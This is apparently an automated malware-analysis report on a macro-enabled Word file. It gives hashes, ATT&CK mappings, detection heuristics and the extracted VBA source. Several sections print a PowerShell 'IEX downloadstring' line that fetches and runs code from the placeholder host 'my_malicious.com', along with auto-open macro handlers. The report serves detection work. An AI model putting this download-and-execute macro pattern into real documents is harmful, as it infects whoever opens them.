Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 57718efac27db4fa…

MALICIOUS

Office (OOXML)

Size: 16.6 KB | Created: 2021-05-26 14:05:00 UTC | Authoring application: Microsoft Office Word 16.0000 | First seen: 2021-05-29
MD5: b7788aaec4dbcc4831f1efc89a12b0e1
SHA-1: 57bb6876ac775d2eed63a7906c68f9ddad182341
SHA-256: 57718efac27db4fa387b721857118b67a31b8afb01ec865d2160f915b4c4cafe
Risk Score: 358

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute upon opening, as indicated by the AutoOpen and Document_Open heuristics. The VBA code directly calls cmd.exe and PowerShell, with the PowerShell command attempting to download and execute content from the URL 'http://my_malicious.com'. This indicates downloader or dropper functionality, consistent with the ClamAV detection 'Doc.Downloader.Pwshell-10001336-0'.

Heuristics 9

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Sub Macro2()
        Shell ("cmd.exe | HELLO")
        powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://my_malicious.com')
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Shell ("cmd.exe | HELLO")
        powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://my_malicious.com')
    End Sub
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    Sub Macro2()
        Shell ("cmd.exe | HELLO")
        powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://my_malicious.com')
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "NewMacros"
    Sub AutoOpen()
        Macro1
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Sub
    Sub Document_Open()
        Macro1
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://my_malicious.com | In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 692 bytes
SHA-256: 922db3691609ce098b07cbe4c5d056f7b2ecd403cd1cb62dc39862719e7ffb34
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    Macro1
End Sub
Sub Document_Open()
    Macro1
End Sub
Sub Macro1()
'
' Macro1 Macro
'
'
    Selection.TypeText Text:="This is a test of the Macro"
    Selection.TypeParagraph
    
End Sub
Sub Macro2()
    Shell ("cmd.exe | HELLO")
    powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://my_malicious.com')
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 9728 bytes
SHA-256: 4e67c71292762ea4c5c7592de5d24b06c07ab14712f9c43477ff92d89a82f8ab
Detection
ClamAV: Doc.Downloader.Pwshell-10001336-0
Obfuscation or payload: unlikely